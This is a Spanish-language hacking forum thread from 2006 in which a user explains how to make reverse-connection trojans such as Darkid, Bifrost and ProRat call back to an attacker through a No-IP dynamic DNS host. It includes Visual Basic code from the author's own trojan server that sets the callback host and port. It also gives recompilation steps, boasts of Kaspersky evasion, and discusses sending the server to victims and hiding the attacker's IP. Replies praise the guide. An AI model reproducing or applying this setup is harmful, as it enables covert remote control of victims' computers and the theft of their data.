Junio 22, 2018, 06:31:23 pm

Autor Tema: CONEXION INVERSA(Como implementarla en troyanos)  (Leído 1652 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Graphixx

  • Me das tu IP?
  • *
  • Mensajes: 19
  • Sexo: Masculino
  • ¤ Whitehat ¤
    • Ver Perfil
    • http://www.colombiaunderground.org
CONEXION INVERSA(Como implementarla en troyanos)
« en: Diciembre 24, 2006, 10:42:47 am »
Hola a todos, como estoy usando Internet ADSL y el proveedor no me suministra una IP estática, debo encontrar un modo de obtener una…y esto lo vamos a lograr con el servicio de conexión inversa de No-ip.

You are not allowed to view links. Register or Login
Paso 1: Entra en You are not allowed to view links. Register or Login y pulsa sobre FREE NO-IP. Una vez hecho esto le das al botón de abajo Sign up now!

Cuando te registres y valides tu cuenta, pulsando sobre el link que mandaran a tu cuenta de correo, logueate en la página poniendo tu email y password.

Paso 2: Pulsa sobre el botón ADD en el panel de la izquierda.
En hostname pon lo que quieras, por ejemplo: graphixx y elige algunos de los host's que ponen ahi, por ejemplo no-ip.org o sytes.net da igual cuál sea. En Host Tipe deja DNS (A) y deberá aparecer tu IP en IPadresses. El resto dejalo como está y dale a create host.
En un minuto o menos debería estar.

Paso 3: Ahora vete a downloads y descarga el DUCK para Windows 
Instala este programa, que tendrás que tener abierto siempre que uses un troyano con conexión inversa.
Al abrirlo te pedirá tu email y password (el mismo que tienes en no-ip.com).


Una vez te loggees en el programa deberá aparecerte algo como: graphixx.sites.net. Cliquea sobre la carita feliz hasta que se ponga así:  XD y entonces estarás conectado.


Paso 4: Ahora creamos un Server con un troyano de conexión inversa, Ej.: el Darkid o bifrost. En donde antes teníais que poner vuestra ip, ósea en DNS, pondréis el nombre del host (en este caso graphixx.sytes.net) y ya está.
Ahora cuando le envíes el Server a alguien conectará con no-ip y no-ip conectará contigo tengas la ip que tengas (siempre que tengas abierto el DUCK).

Las ventajas que le veo: Podrán usar la conexión inversa los que tengan IP dinámica sin miedo a que les cambie la IP.
Puedes conectarte desde casa de un amigo (solo tienes que conectarte con el DUCK y las notificaciones llegarán a la ip de tu amigo) o puedes conectarte a las víctimas de algún amigo si te conectas en el DUCK con su email y pass.
Más anonimidad, creo que si el infectado hace un netstat, solo le sale la IP del host (Proxy) que usas, y no tu ip.
Os recuerdo que esto funciona tanto en módems como en routers, siempre y cuando los que tengan router abran el puerto que use ese troyano (el del bifrost es el 2000, y el del ProRat el 5110)
Pues nada, un saludo, y espero que les funcione a todos.
Bye

Interfaz del programa NO-IP
You are not allowed to view links. Register or Login
Observemos, donde dice You are not allowed to view links. Register or Login debe aparecer la cuenta de correo con la que te registraste.

Para cambiar de cuenta (Proxy), pulsas en el botón edit, o bien si la contraseña que suministraste no era valida.

Y podrás observar también donde dice:
Proxy 200.116.160.12, será la dirección IP que le saldrá a la victima si intenta localizarte.

Ahora miremos como configurar mi troyano para que trabaje con tu cuenta de
NO-IP.

Puedes encontrar mi troyano en el siguiente post:
You are not allowed to view links. Register or Login

En este punto pido disculpas, ya que lo más adecuado seria implementar en el Cliente un editserver que genere automáticamente los servers con la IP especificada, estoy trabajando en eso…

Vamos a abrir el proyecto Server, y nos vamos al código fuente del form y allí ubicamos el evento form_load ( ), donde encontramos el siguiente código…

'conexion inversa
Dim ip As String
Dim ipftp As String
Dim port As Integer

'ip = "graphixx.sytes.net" <--- proxy
ip = "graphixx.sytes.net"
ipftp = "graphixx.sytes.net"
port = 314
WS.RemoteHost = ip
WS.RemotePort = port
tmr_inversa.interval = "3000"


Las líneas que aquí importan son:
ip = "graphixx.sytes.net"
ipftp = "graphixx.sytes.net"
Ya que es en estas donde le estamos indicando al Server hacia donde debe marcar para conectarse, en esta parte debes cambiar graphixx.sytes.net, por tu propia cuenta de NO-IP, o bien de algún otro servicio que desees utilizar.

También resaltare en esta ocasión el puerto:
Port = 314, ya que si deseas cambiarlo eres libre de hacerlo pero recuerda, estamos trabajando sobre el Server, si lo cambias aquí también debes cambiarlo en el Cliente.

Y listo una vez hallas configurado el IP, solo queda volver a compilar el proyecto, te vas a Archivo/Generar Darkid.exe, suerte y que lo disfrutes…

Al momento de redactar este manual era indetectable este método por el Kapersky, no lo probé sobre otros antivirus.

Hasta una próxima entrega…
Graphixx.
You are not allowed to view links. Register or Login[/img][/url]

Desconectado sebaston

  • Me das tu password?
  • **
  • Mensajes: 203
    • Ver Perfil
Re: CONEXION INVERSA(Como implementarla en troyanos)
« Respuesta #1 en: Diciembre 24, 2006, 10:55:25 am »
CHe graphixx muy bueno manual de no-ip..y te felicito por el troyano---feliz NAvidad..

Desconectado Arkam

  • Me das tu IP?
  • *
  • Mensajes: 12
  • Sexo: Masculino
    • Ver Perfil
Re: CONEXION INVERSA(Como implementarla en troyanos)
« Respuesta #2 en: Diciembre 24, 2006, 10:58:34 am »
Perdonar la pregunta pkt ke voy ha hacer:

¿Para que sirve el NO-IP?
« Última modificación: Diciembre 24, 2006, 11:00:56 am por Arkam »
You are not allowed to view links. Register or Login[/img]

Desconectado DNS

  • Me das tu IP?
  • *
  • Mensajes: 88
    • Ver Perfil
Re: CONEXION INVERSA(Como implementarla en troyanos)
« Respuesta #3 en: Diciembre 24, 2006, 11:23:35 am »

Un troyano de conexion invresa significa q la computadora infectada se va a conectar a la tuya y no alrevez, muchas veces uno no tiene ip fija, asi que cuando el server trata de conectarse a tu computadora, se pierde en internet, debido a que no encontro tu ip, que ya cambio.

El no-ip sirve para que el server de tu victima se conecte a tu computadora mediante un redireccionamiento de ip es decir, tu victima se conecta al no-ip, y el no-ip se conecta contigo y bravo!!tenemos conexion XD XD ::::::::::::::::::::::DNS:::::::::::::::::.SALUDOS:::::::::::::FELIZ NAVIDAD:::::::::::::::.
Soy totalmente nuevo en esto.....pero me gusta colaboar con lo que puedo. SALUDOS ..:::DNS:::..

Desconectado DNS

  • Me das tu IP?
  • *
  • Mensajes: 88
    • Ver Perfil
Re: CONEXION INVERSA(Como implementarla en troyanos)
« Respuesta #4 en: Diciembre 24, 2006, 11:26:15 am »
muy buena informacion, lastima que este tan repetida en el foro pero de ahi en fuera muy buena informacion::::::::::::DNS::::::::::::.


xx
cansado de troyanos de conexion inversa me paso a conexion directa

Iniciado por turbokit2

18 Respuestas
6495 Vistas
Último mensaje Junio 11, 2007, 01:08:16 pm
por turbokit2
xx
Troyanos de Conexion Inversa

Iniciado por Rama_04

2 Respuestas
859 Vistas
Último mensaje Noviembre 12, 2014, 02:12:11 am
por AMHz
question
troyanos conexion inversa

Iniciado por canker

6 Respuestas
2289 Vistas
Último mensaje Febrero 02, 2007, 05:29:21 pm
por Suikodenman
question
Troyanos de Conexión Inversa

Iniciado por Rama_04

7 Respuestas
1294 Vistas
Último mensaje Noviembre 12, 2014, 10:36:10 am
por Ninfrock
xx
problemas con troyanos de conexion inversa

Iniciado por ThrashMetalWarrior

3 Respuestas
1835 Vistas
Último mensaje Marzo 22, 2008, 09:13:09 am
por ThrashMetalWarrior
xx
en que se diferencia el SUBSEVEN y los troyanos de conexion inversa?

Iniciado por doggfather

8 Respuestas
2032 Vistas
Último mensaje Mayo 25, 2007, 08:01:21 am
por .:ACKMAN:.
resuelto
Diferencias/Ventajas entre Troyanos de conexion directa e inversa?

Iniciado por EddyMataGallos

2 Respuestas
1671 Vistas
Último mensaje Julio 15, 2009, 06:32:47 am
por EddyMataGallos
xx
Como funciona la conexion inversa??

Iniciado por Joker

3 Respuestas
4754 Vistas
Último mensaje Octubre 18, 2006, 02:44:46 pm
por OzX
xx
conexion inversa

Iniciado por mig5ueles

4 Respuestas
1562 Vistas
Último mensaje Febrero 03, 2007, 10:03:19 am
por Guan
angry
Conexion inversa.

Iniciado por des_trozado

6 Respuestas
1838 Vistas
Último mensaje Mayo 21, 2006, 05:14:50 pm
por des_trozado